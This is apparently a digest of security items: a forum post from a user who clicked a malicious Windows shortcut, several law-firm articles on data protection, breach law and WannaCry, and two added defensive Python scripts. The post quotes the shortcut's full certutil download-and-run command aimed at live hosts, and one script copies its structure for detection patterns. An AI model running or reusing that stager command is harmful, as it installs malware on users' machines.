.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder... I ran scans with Malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…
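The shortcut target quoted above has the shape of a "living off the land" download stager: cmd.exe launched with delayed variable expansion, the download tool assembled from environment variables, an executable named after %USERNAME%, and output redirected to nul. The following Python script is an added triage example (not from the poster or BleepingComputer) that scores shortcut command lines against those structural indicators so a defender can flag them during incident review. The sample targets are constructed for the example; the "stager" sample copies only the structure of the post's target and points at .invalid placeholder hosts, not the hosts in the post.

```python
import re

# Structural indicators of a cmd.exe/certutil download-and-execute stager,
# modelled on the .lnk target quoted in the post above.
INDICATORS = {
    # cmd.exe started with delayed expansion (/v:on), needed for the !VAR! tricks below
    "cmd_delayed_expansion": re.compile(r"(%ComSpec%|cmd(\.exe)?)\s+/v:on", re.I),
    # certutil used as a downloader rather than a certificate tool
    "certutil_urlcache": re.compile(r"certutil[^&|]*-urlcache", re.I),
    # -f forces a fresh fetch of the remote file
    "certutil_force_download": re.compile(r"-urlcache[^&|]*-f\s", re.I),
    # the dropped executable is named from an environment variable, e.g. "%USERNAME%.exe"
    "exe_named_from_env_var": re.compile(r'"?%[A-Z_]+%\.exe"?', re.I),
    # the URL scheme is stored in one variable and the host appended later
    "url_prefix_split_into_variable": re.compile(r"https?://\s*&", re.I),
    # only download when the payload is not already present
    "if_not_exist_then_fetch": re.compile(r"IF\s+NOT\s+EXIST", re.I),
    # all output hidden from the user
    "output_suppressed": re.compile(r">\s*nul\s+2>&1", re.I),
    # delayed-expansion variable references such as !H!
    "delayed_expansion_vars_used": re.compile(r"!\w+!"),
}

# Weights are an assumption for this example; tune them against your own data.
WEIGHTS = {
    "cmd_delayed_expansion": 2,
    "certutil_urlcache": 4,
    "certutil_force_download": 2,
    "exe_named_from_env_var": 3,
    "url_prefix_split_into_variable": 3,
    "if_not_exist_then_fetch": 1,
    "output_suppressed": 1,
    "delayed_expansion_vars_used": 1,
}
THRESHOLD = 5  # assumed cut-off: a lone cmd /v:on or a lone >nul should not alert


def matched_indicators(target: str) -> list[str]:
    """Names of all indicators present in a shortcut target string."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(target)]


def risk_score(target: str) -> int:
    """Sum of the weights of the indicators matched by the target."""
    return sum(WEIGHTS[name] for name in matched_indicators(target))


def is_suspicious(target: str) -> bool:
    return risk_score(target) >= THRESHOLD


def triage(targets: dict[str, str]) -> dict[str, dict]:
    """Score a batch of {label: target} pairs, e.g. extracted from a startup folder."""
    return {
        label: {"score": risk_score(t), "suspicious": is_suspicious(t),
                "indicators": matched_indicators(t)}
        for label, t in targets.items()
    }


# Constructed sample shortcut targets (not taken from any real system).
SAMPLE_TARGETS = {
    # ordinary shortcut to an installed program
    "benign_app": r'"C:\Program Files\Example\example.exe" --profile default',
    # a cmd-based shortcut that merely writes a marker file
    "benign_cmd": r"%ComSpec% /c echo done > C:\Temp\done.txt",
    # same structure as the post's target, with placeholder hosts and variable names
    "stager": (
        r"%ComSpec% /v:on/c(SET V4=/?abc=gulches_%PROCESSOR_ARCHITECTURE% !H!"
        r'&SET H="%USERNAME%.exe"&SET D=certutil -urlcache -f https://'
        r"&IF NOT EXIST !H! (!D!host-a.invalid!V4!||!D!host-b.invalid!V4!&!H!))>nul 2>&1"
    ),
}

if __name__ == "__main__":
    for label, result in triage(SAMPLE_TARGETS).items():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{label:12} score={result['score']:2} {flag:10} {result['indicators']}")
```

The script works on command-line strings, so on a live system you would first pull the target and "start in" fields out of each .lnk with your usual shortcut parser or forensic tool and feed them in; the certutil and %USERNAME%.exe indicators alone are enough to cross the threshold, which mirrors the sort of thing the poster would want checked after clicking an unexpected shortcut.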

Protect Trade Secrets While Employees Work From Home? - The National Law Review

Posted: 25 Mar 2020 12:00 AM PDT

In response to the COVID-19 outbreak, many businesses (particularly those in states or cities under "stay home" orders) have implemented a work-from-home ("WFH") directive for employees.  It is important for businesses to address the security of their trade secrets in this new environment in order to reduce the risk of misappropriation.  It is also important to reduce the risk that the trade secret status of information will be lost based on a failure to take reasonable steps to protect its secrecy.  This article addresses some steps your business can consider taking to protect trade secrets accessible by employees who are now working at home.  Even if your business had a WFH policy before the COVID-19 outbreak, it should be re-visited in light of the current circumstances flowing from a pandemic during which all or most of your workforce may be operating on a WFH basis.  For example, what was once a "no trade secrets may be taken home" policy may be impossible in the current climate.

The following are a few potential steps for consideration to protect trade secrets in the hands of employees working at home:

  • Repeatedly remind your workers that it is their responsibility to ensure that confidential information remains confidential while in their home worksites and that they should be constantly watching for potential vulnerabilities.

  • Reiterate to employees that they are prohibited from transmitting or maintaining company confidential information except as authorized by the company and that includes personal email accounts, cloud accounts, social media, etc.

  • Require your WFH workers to keep their homes locked to the extent that your confidential information is maintained there. Also tell them that, ideally, they should do their work in a room to which only they have access.  If that is not possible, they need to be vigilant in not inadvertently giving others access to your confidential information (e.g., keep a "clean desk" to prevent others in their homes from viewing company trade secrets; be mindful not to have conference calls or video-chats about confidential information in the presence of others in their homes).   This is true even if they think those others do not present a realistic risk of misappropriation (e.g., a friend or family member).  Make your employees understand that, in addition to avoiding misappropriation, taking reasonable steps to protect secrecy is also critical since the company will not be able to protect information as a trade secret if it loses its trade secret status.

  • If you anticipate your workers will verbally discuss confidential matters at their home office, request that home assistant devices (such as Google Home and Alexa) be turned off and out of earshot from the worker's home office or workspace. These devices are constantly listening to their environment.

  • Prohibit workers from printing documents as much as reasonably practical while they work from home. To the extent that hard copy confidential materials are needed, tell your WFH workforce not to discard them in their ordinary trash and require them to retain all confidential documents in secure (locked) locations at their homes so they may be securely disposed of once your workforce returns to the office.

  • If reasonably possible, direct your workforce to connect to your business's network as securely as possible, such as through a VPN. Consider requiring two-factor authentication for access to your business's VPN or remote network.

  • Remind your WFH workers to password-protect their home WiFi system and to work with your IT personnel so that communications including confidential information are encrypted. Consider software that requires an email recipient to possess a designated digital signature to review messages and open attachments.  This prevents the forwarding of trade secret information to email accounts beyond your business.

  • If possible, consider prohibiting your workers from transmitting trade secret information via email altogether. Instead, permit access to trade secret information via secured shared drives with access rights limited to a need-to-access basis.

  • Mandate that, with the assistance of your IT personnel, your WFH employees set their home computer screens to lock up after a set time period (e.g., 5 minutes) of non-use and require passwords to unlock the screens.

  • Educate your workers about malicious emails, SMS messages, and other communications designed to infiltrate your business's network.  Bad actors are taking advantage of the Coronavirus pandemic by sending emails and SMS messages regarding purported Coronavirus tips, maps, and other scare tactics to entice users to open malware.  Remind your workers to only open messages from trusted sources and require your workers to report suspicious messages to your IT team. Admonish employees that if they open malware or a virus or have been hacked, they should contact your IT team immediately so that your business can attempt to do damage control as soon as is possible.

  • If reasonably practical, limit trade secret materials to be used at home to those needed for current projects.

  • Develop a system to account for all confidential information maintained at your workers' homes and, if appropriate for your business, create a check-out/check-in process for your workers to return such documents.

  • If possible, implement a system that notifies your IT department whenever an employee downloads, copies, prints, or deletes a significant amount of data from your business's network. The activity may turn out to be legitimate, but it should be investigated.

  • If reasonably practical, implement remote lock-out and wipe capabilities. These procedures permit your IT department to immediately lock an employee out of your network if the employee compromises your confidential information and to wipe all company data from a device if an employee misplaces a company device.  These procedures could also be used if an employee becomes incapacitated.

  • If possible, issue laptops to employees that have anti-virus/malware applications installed and that do not have USB ports to prevent unauthorized thumb drive downloads.

  • Give your employees a specific "go to" person at the company, should they have any questions or concerns about working at home with company confidential information.

Also, remember that the protection of your trade secrets goes beyond the regulation of your immediate workforce.  Consider asking outside vendors, suppliers, and outside professionals with access to your business's trade secrets what they are doing to protect your trade secrets during the COVID-19 pandemic if their personnel with access to your trade secrets are now working from home.  If you receive an unsatisfactory response, take appropriate action.

There is no one-size-fits-all approach to protecting trade secrets.  Instead, each business must assess what is "reasonable under the circumstances" to maintain the secrecy of its trade secrets.  What may be reasonable to one business may not be reasonable for another (e.g., given the difference in size, sophistication, and resources).  Thus, a business facing the current COVID-19 WFH environment should consult with its legal counsel to assess reasonable steps it should take to maintain the secrecy of its trade secrets during this unprecedented WFH period.

As you are aware, things are changing quickly and there is no clear-cut authority or bright line rules about what are reasonable steps to protect trade secrets in response to WFH during COVID-19.  This article is not an unequivocal statement of the law, but instead offers some potential reasonable steps for consideration.  This article does not address the potential impacts of the numerous other local, state and federal orders that have been issued in response to the COVID-19 pandemic, including, without limitation, potential liability should an employee become ill, requirements regarding family leave, sick pay and other issues.

Copyright © 2020, Sheppard Mullin Richter & Hampton LLP.

Critical Cybersecurity Safeguards Outlined By IRS - The National Law Review

Posted: 02 Oct 2018 12:00 AM PDT

Summary

The Internal Revenue Service and the Security Summit partners recently issued a news release outlining the "Security Six," a list of essential steps to protect stored employee information on networks and computers. Employee benefits professionals, including those who administer welfare and retirement plans for employees and beneficiaries, should review and implement the "Security Six" in order to protect sensitive data from cyberattacks.

In Depth

Background

In recent years, cybercriminals have exponentially increased cyberattacks and continuously invent new ways to commit data and identity theft. Benefit plan sponsors and plan administrators often share and store sensitive employee data in order to administer benefit plans. Plan sponsors and fiduciaries must consider the importance of strong cybersecurity measures in order to safeguard sensitive personal data. If not, cyberattacks could result in account takeovers, identity theft and data integrity breaches.

On July 17, 2018, the Internal Revenue Service, state tax agencies and the private-sector tax industry—known as the Security Summit partners—released the "Security Six." The "Security Six" are six basic safeguards designed to protect data that is stored on tax professionals' computers and networks.

Key Aspects of the "Security Six"

The "Security Six" encourages professionals to implement the following protective measures: 1) antivirus software, 2) firewalls, 3) two-factor authentication, 4) backup software and services, 5) drive encryption and 6) a written data security plan.

Antivirus Software

Antivirus software scans files and a computer's memory for specific patterns that may indicate the presence of malicious software, or malware. According to the US Computer Emergency Readiness Team, a division of the Department of Homeland Security, antivirus vendors discover new malware daily. This is why it is important for computer users to check regularly for the latest updates of antivirus programs.

Computer users should configure antivirus software to automatically scan specific files or directories in real time and create a prompt at set intervals for complete scans. If the antivirus software does not automatically scan new files, users should manually scan files and media received from an outside source before opening them. This process includes saving and scanning email attachments or web downloads rather than opening them directly from the source.

Firewalls

Firewalls protect against outside attackers by shielding the user's computer or network from malicious or unnecessary network traffic. The advantage of hardware-based firewalls is that they are separate devices running their own operating systems, so they offer an additional line of defense against attacks when compared to system or host-level protections. Most operating systems include a built-in firewall feature that should be enabled for added protection even if using a hardware-based firewall.

Firewalls primarily help protect against malicious traffic, not against malicious programs, and may not protect the device if the user accidentally installs malware. The Security Summit reminded tax professionals that anti-virus software and firewalls cannot protect data if computer users fall for email phishing scams and reveal sensitive data, such as usernames and passwords.

Two-Factor Authentication

Many email providers now offer customers two-factor authentication protections to access email accounts. Often two-factor authentication means the returning user must enter credentials, plus another step, such as entering a security code to complete the process. Professionals should always opt for multi-factor authentication protection when it is offered on an email account or any other password-protected product.

Backup Software and Services

Professionals should routinely back up critical files to external sources. This means a copy of the file is made and stored either online as part of a cloud storage service or a similar product. Important files can also be copied to an external disk, such as an external hard drive that has multiple terabytes of storage capacity.

Drive Encryption

Professionals should install drive encryption software for full-disk encryption. Drive encryption, or disk encryption, transforms data on the computer into unreadable files for the unauthorized person accessing the computer. Professionals can also use a drive encryption that is a stand-alone security product and encrypt removable media, such as a thumb drive and its data.

Written Data Security Plan

The Security Summit also reminded tax professionals of other important steps, such as developing a written data security plan as required by the Federal Trade Commission and its Safeguards Rule. Revised IRS Publication 4557 includes security recommendations and can assist with creating a data security plan, and IRS Publication 5293 compiles data security information.

Impact of IRS Guidance on Retirement and Welfare Plans

Employees typically provide retirement plan record-keepers and service providers with significant personal information, such as the social security number, address, birth date, bank account information, retirement date, compensation information and asset balances. Similarly, welfare plan administrators store personal information on employees and dependents, including age, income and health history. If a cybercriminal obtains this information from a plan administrator's computer or network, it can lead to identity theft for plan participants. Because of the important information maintained by retirement plans and welfare plans, they attract cybercriminals. Benefit plan sponsors and plan administrators should prudently follow the "Security Six" safeguards provided by the IRS and the Security Summit.

Conclusion

As cybercriminals continue to develop new methods to obtain sensitive personal data from the networks of professional offices, employee benefits professionals must be both proactive and reactive to new data security threats. It is crucial for employee benefits professionals to make sure they have implemented the "Security Six" safeguards. Installing firewalls, antivirus software, backup software and drive encryption, and developing a data security plan, will help protect the sensitive personal information stored on many professional office networks and computers.

We would also like to thank law clerk Charnae Supplee for contributing to this article.

WannaCry Ransomware Cyberattack Raises Legal Issues - The National Law Review

Posted: 22 May 2017 12:00 AM PDT

The recent cyberattack highlights the need for firms to engage in proactive prevention and protection.

Ransomware (malware that encrypts data pending an extortion payment) is a recurring cyber threat that is growing more pervasive and profitable for criminals. The most recent attack this month by the WannaCry virus highlights the potential global impact, speed and acceleration, and scope of the ransomware problem.

Ransomware as one unique form of cyberattack has been an increasing global and domestic cybersecurity problem over the last several years. Ransomware targets have included businesses, hospitals, schools, and even police departments.[1] Worryingly, some recent forms of ransomware are becoming more sophisticated and resilient.

Because of the recurring nature of this type of cyberattack, in this article we offer some steps for proactive prevention and protection and some thoughts on the legal issues that may arise following these types of cyberattacks.

Background

Ransomware like WannaCry is designed to encrypt key data on a user's computer or network. The cyberattacker then demands that victims pay a ransom to have their data or files decrypted or restored.

In the case of WannaCry specifically, the software demands that the victim pay a ransom of $300 in bitcoins at the time of infection. If the user doesn't pay the ransom within three days, the amount doubles to $600. After seven days without payment, WannaCry is designed to delete all of the encrypted files and all data will be lost.

The WannaCry virus is designed to spread quickly among computer networks and exploits a vulnerability in computers operating Microsoft Windows without a certain security "patch" that Microsoft issued in March 2017. Recent estimates are that WannaCry quickly spread to more than 150 countries and has affected over 100,000 organizations.[2]

Initial Defense: What You Can Do

Cybersecurity starts with prevention and protection. Common steps a firm and its employees can take to thwart or mitigate ransomware include the following:

Offline and Secure Backups

Ransomware demands are premised on the need to recover and restore data that has been locked up. If offline and unaffected backups exist, the ransomware demands can be disregarded and are rendered irrelevant.

The backup can be either in the form of an external physical hard drive or with a secure cloud-computing service provider. With backups, the firm can erase the data from the infected computers and restore its system from the backups after a ransomware demand.

Avoiding Links or Phishing Schemes with Attachments Containing Malware

An initial line of cyber defense is to avoid the introduction of malware or ransomware onto a network or computer to begin with. This is where the human factor comes in. Many viruses and malware spread by tricking end users to download them via email based on phishing campaigns, spear phishing, or spam. The malware could be embedded in an attachment or at a link contained in an email.

One primary defensive step the firm can take is to train and encourage its employees to practice vigilance against key cyber risks. Cyber-aware employees will avoid clicking on links or downloading attachments from suspicious emails or sources.

Here are some ways to spot a "phishy" email:

  • Look at the email address of the sender and see if it looks legitimate.

  • Look for obvious typos and errors in the body of the email.

  • Hover over hyperlinks and read the name of the website to which they link before clicking.

  • Exercise common sense and good judgment when assessing the legitimacy of an email (i.e., are they asking you to reply with personal or financial information?).
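The third tip above, reading where a link really goes before clicking, is something a mail gateway or security team can automate for a whole inbox. The Python script below is an added example, not part of the article or its authors' guidance: it parses the HTML body of a message with the standard library, and reports every anchor whose visible text looks like a web address but whose href points at a different host. The sample message is constructed for this example and uses example-bank.com and .invalid hostnames.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> element in an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.anchors: list[tuple[str, str]] = []
        self._href: str | None = None
        self._text: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def hostname_of(url_or_domain: str) -> str:
    """Lower-cased hostname; bare domains such as 'support.example.com' get a scheme added."""
    if "://" not in url_or_domain:
        url_or_domain = "http://" + url_or_domain
    return (urlparse(url_or_domain).hostname or "").lower()


def looks_like_web_address(text: str) -> bool:
    """True when the visible link text would be read by a person as a URL or domain."""
    return "://" in text or re.fullmatch(r"[\w.-]+\.[a-z]{2,}(/\S*)?", text, re.I) is not None


def find_deceptive_links(html_body: str) -> list[dict]:
    """Anchors whose displayed address and actual destination host disagree.

    A destination that is a subdomain of the displayed host (e.g. text 'example.com',
    href 'https://www.example.com/') is treated as consistent.
    """
    collector = _AnchorCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.anchors:
        if not looks_like_web_address(text):
            continue  # "click here" style links cannot be judged by text alone
        shown, actual = hostname_of(text), hostname_of(href)
        if shown and actual and shown != actual and not actual.endswith("." + shown):
            findings.append({"shown": shown, "actual": actual, "href": href, "text": text})
    return findings


# Constructed sample message body (not a real phishing e-mail).
SAMPLE_EMAIL_HTML = """
<p>Your account needs verification. Visit
<a href="http://login.example-bank.com.verify-now.invalid/">https://www.example-bank.com/</a>
within 24 hours.</p>
<p>Questions? See <a href="https://support.example-bank.com/help">support.example-bank.com</a>
or <a href="https://www.example-bank.com/">click here</a>.</p>
"""

if __name__ == "__main__":
    for finding in find_deceptive_links(SAMPLE_EMAIL_HTML):
        print(f"link text shows {finding['shown']} but goes to {finding['actual']}")
```

Only the first link in the sample is reported: its text shows the bank's domain while the href goes elsewhere. The second link is consistent and the third has no address in its text, so the check stays silent on it; those "click here" links still need the manual hover the tip describes.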

Update Operating Systems, Software, and Patches and Use Antivirus Software

Another key step is ensuring that operating systems, security software, and patches are up to date for all systems and devices. Software makers frequently issue security updates for their products. These updates will often address and "patch up" security vulnerabilities.

Employees should also be reminded to regularly update the software on their mobile and other devices. While all software should be kept up to date, updated antivirus software is especially important.

Monitoring and Intrusion Detection

The firm can take steps to detect and block malware through monitoring and intrusion detection. Monitoring may include analyzing basic network traffic as well as looking for any anomalous activity on the firm's network. Firewalls and intrusion detection systems can help protect against and provide alerts about unauthorized access or potential cyber threats.

Tailored Protections

Effective cybersecurity requires a tailored and risk-based approach to safeguard information and systems. There is no one-size-fits-all approach.[3] Typically, a layered security approach can protect data depending on the cyber risks, system, and information. Firms can consider whether necessary protections are in place as part of their broader cybersecurity strategy.

Incident Response Plan That Is Tested

In the event of a cyberattack, the firm can deploy its incident response plan. This plan typically includes key points of contact and a tailored response strategy to ensure that the firm can quickly implement appropriate steps to recover.

In the event of a ransomware demand, a number of technical and legal issues may arise. A technical team can isolate the infected system, assess the scope of any damage, take steps to mitigate the cyberattack, and determine whether a decryption key may exist (low probability but worth considering). The firm can screen any backups to ensure that they are malware free. The technical team can work closely with counsel, as noted in the next section, to address legal issues at all phases including a decision about contacting law enforcement. A post-incident review will be useful to highlight other security measures and steps to protect the organization.

Common Legal Issues

The facts of each cyber incident must be carefully considered against a host of potential legal issues. Experienced counsel can guide firms through these issues as well as the investigation and any legal process. We have seen a number of common legal issues that may arise during a ransomware or cyberattack. Issues to consider include the following:

Initial Cyber Investigation under Attorney-Client Privilege

Initially, the firm must carefully assess the nature of the attack and its scope. There are many initial considerations:

  • What networks, systems, or data were affected?

  • Is the cyber incident ongoing or has it been contained?

  • Has security been restored?

  • What, if any, data may have been exfiltrated?

  • Was any data "accessed" or "acquired" or reasonably believed to have been accessed or acquired?

The answers to these and other related questions will likely take some time to resolve. Because the answers will likely have legal consequences, it is highly recommended that any cyber investigation be conducted under attorney-client privilege. This will allow the firm to obtain frank and candid legal advice as the facts are emerging.

Determining Any Notification Requirements

Depending on the facts and nature of the data, the cyber incident may trigger a legal notification requirement. The notifications may be obligated under contractual requirements or statutes depending on the industry and jurisdiction of enforcers. Additionally, it is important to note that there may be different triggering standards for the notification requirement.

As an example, in the United States, 52 jurisdictions (including 48 states, the District of Columbia, Guam, Puerto Rico, and the Virgin Islands) have enacted some version of a data breach notification law.[4] Under these laws, notification may be required for any customer whose personally identifiable information (PII) was acquired or accessed, or reasonably likely to have been acquired or accessed. While most states require some form of notice to their residents depending on applicable legal standards, some states also require notification to public agencies, such as the state attorney general. Until a uniform federal standard is adopted, the nuances and variations among these statutes must be reviewed and evaluated.[5]

Response to Government Inquiries and Enforcement Actions

Regulators may seek information regarding a cyber incident. Federal and state agencies have increased their focus on whether firms have reasonable cybersecurity protections in place even where a firm is the victim of a cyberattack.

Experienced counsel can assist in responding to these inquiries and in devising a recommended strategy with which to respond. Government inquiries may be initiated by federal and state regulators. We are seeing cases involving concurrent jurisdiction of regulators that may result in simultaneous investigations.

Anticipating Potential Civil Litigation

The firm can consider what specific steps can be taken to avoid or mitigate potential civil actions, including private rights of action or class actions regarding a cyber incident. Many states allow for a private right of action to be filed in order to recover damages. On cybersecurity matters, there has been substantial activity involving class actions. Engaging experienced counsel early after the cyber incident may help the firm recognize potential litigation, and counsel can recommend steps to anticipate and mitigate costly legal actions.

Contacting Law Enforcement

Another important question involves whether and when to contact law enforcement. Federal authorities recommend that law enforcement be contacted when ransomware occurs.[6] The facts of each case must be carefully considered by the firm. Law enforcement will likely want to obtain relevant data about the cyber incident that is properly authenticated under chain of custody protocols. The investigation and prosecution of the incident by law enforcement may result in public information and proceedings. Experienced counsel can assist in answering questions about the criminal justice process and cyber prosecutions.

Information Sharing in the Private and Public Sectors

The sharing of cyber-threat information with others may present issues that require legal consideration. A number of industries (such as automotive, aviation, and financial services) have Information Sharing Analysis Centers (ISACs). The Cybersecurity Information Sharing Act of 2015 was enacted to establish new protections and foster information sharing by the private sector to the government to "share cyber threat indicators and defensive measures."[7] The circumstances of sharing information under this law should be carefully considered. Communications with competitors should also be evaluated to ensure antitrust protections are in place and to avoid further governmental scrutiny concerning the contact with competitors.[8]

Scope of Cyber-Insurance Coverage

While many firms have cyber insurance, whether it covers ransomware depends on the terms of the applicable policy. Experienced counsel can review and provide guidance on any coverage issues.

Conclusion

Cyberattacks such as ransomware are unfortunately becoming more pervasive. Firms can take a number of steps to prevent and protect themselves against this form of cyberattack.

When a cyber incident arises, experienced counsel can help identify issues that may arise, work closely with technical specialists, and make recommendations for how best to navigate the process. Most important to firms is the implementation of a strategy that minimizes business disruptions and permits a return to full business operations as soon as possible.
[1] See, e.g., Press Release, Computer Virus Affects Police Department Servers, Cockrell Hill Police Department (Jan. 25, 2017); see also Chris Francescani, Ransomware Hackers Blackmail U.S. Police Departments, NBC News (Apr. 26 2016); Jason Trahan, Cockrell Hill police lose years worth of evidence in ransom hacking, WFAA (Jan. 25, 2017).

[2] For more information on WannaCry, see generally US Department of Homeland Security/US Computer Emergency Readiness Team (US-CERT), Indicators Associated With WannaCry Ransomware, Alert (TA17-132A) (originally released May 12, 2017, last revised May 19, 2017); National Cybersecurity and Communications Integration Center, What Is WannaCry/WanaCrypt0r?.

[3] For example, the National Institute of Standards and Technology (NIST) Cybersecurity Framework 1.0 (Feb. 12, 2014) provides a useful flexible approach to assess and manage cybersecurity risk.

[4] For a listing of the data breach notification statutes, see National Conference of State Legislatures, Security Breach Notification Laws; see also LawFlash: New Mexico to Become 48th State to Enact Data Breach Notification Statute (Mar. 28, 2017).

[5] See, e.g., M. Krotoski, L. Wang, & J. Rosen, The Need to Repair the Complex, Cumbersome, Costly Data Breach Notification Maze, BNA's Privacy & Security Law Report, 15 PVLR 271 (Feb. 8, 2016).

[6] Ransomware: What It Is and What To Do About It (June 2016).

[7] 6 U.S.C. §§ 1501-1510; Pub. L. 114–113, div. N, title I, § 111, 129 Stat. 2956 (Dec. 18, 2015).

[8] See Department of Justice and Federal Trade Commission: Antitrust Policy Statement on Sharing of Cybersecurity Information (Apr. 10, 2014).

Copyright © 2020 by Morgan, Lewis & Bockius LLP. All Rights Reserved.

Massachusetts Data Breach Notification Requires WISP - The National Law Review

Posted: 13 Apr 2019 12:00 AM PDT

Overview

Since 2010, Massachusetts has required organizations that collect personal data about Massachusetts residents to implement a comprehensive written information security program ("WISP") designed to avoid and respond to data security incidents.

Despite this requirement, many companies, particularly those not physically located in Massachusetts, have not done so. Historically, the absence of a WISP is something that went unnoticed, but that may no longer be the case due to a recent change in the Massachusetts breach notification law.

Specifically, Massachusetts has amended its data breach notification law to require organizations that experience a data security incident to notify the Massachusetts Attorney General and the Massachusetts Director of Consumer Affairs and Business Regulation whether the organization implemented a WISP. This new reporting requirement highlights both the legal and practical need to implement a WISP.

Change in the Law

Effective April 11, 2019, organizations that experience a data breach that exposes the personal information of Massachusetts residents will have new responsibilities under Massachusetts law. In addition to the preexisting requirements that organizations notify the Massachusetts Attorney General and the Massachusetts Director of Consumer Affairs and Business Regulation regarding the nature of the breach, the number of impacted Massachusetts residents, and the steps taken related to the incident, organizations must now also expressly state whether the organization implemented a WISP. Organizations must also state whether they have updated their WISP after the data incident. While this new requirement does not formally go into effect until April 11, 2019, the Office of Consumer Affairs and Business Regulation has already updated its notification form to ask whether the organization implemented a WISP.

Organizations must also continue to notify impacted Massachusetts residents of the data breach and must now notify the residents that there is no charge to institute a security freeze or credit freeze. If the breach disclosed the Social Security Number of Massachusetts residents, the organization must now provide a minimum of 18 months of credit monitoring services, or 42 months if the organization is a consumer reporting agency. Related to this requirement, the organization may not require Massachusetts residents to waive their right to file a lawsuit in exchange for the credit monitoring services.

What is a Written Information Security Program?

A WISP is designed to develop and document the systems and processes that protect the customer and employee personal information stored by an organization. Under Massachusetts law, a WISP must address certain areas, including:

1) designating employees responsible for the security program;

2) identifying and assessing security risks;

3) developing policies for the storage, access, and transportation of personal information;

4) imposing disciplinary measures for violations of the WISP;

5) limiting access by terminated employees;

6) overseeing the practices of third-party vendors;

7) restricting physical access to records;

8) monitoring and reviewing the scope and effectiveness of the WISP; and

9) documenting steps taken in response to data security incidents.

A WISP must also establish certain computer system security standards when technically feasible, including:

1) securing user credentials;

2) restricting access to personal information on a need-to-know basis;

3) encrypting the transmission and storage of personal information;

4) monitoring of security systems;

5) updating firewalls, security patches, anti-virus, and anti-malware software; and

6) training employees on the proper use of the computer security systems.

The Takeaway

Written information security plans are required for those organizations that collect personal information from Massachusetts residents and Massachusetts is taking steps to ensure organizations comply with that requirement. Apart from this legal obligation, all organizations should strongly consider implementing and documenting their processes for protecting personal information and for responding to a data security incident. Proactively assessing and addressing information security risks will not only fulfill the organization's requirements under Massachusetts law, but will allow the organization to reduce its risk of a data security incident and be prepared to quickly respond in the event an incident does take place.
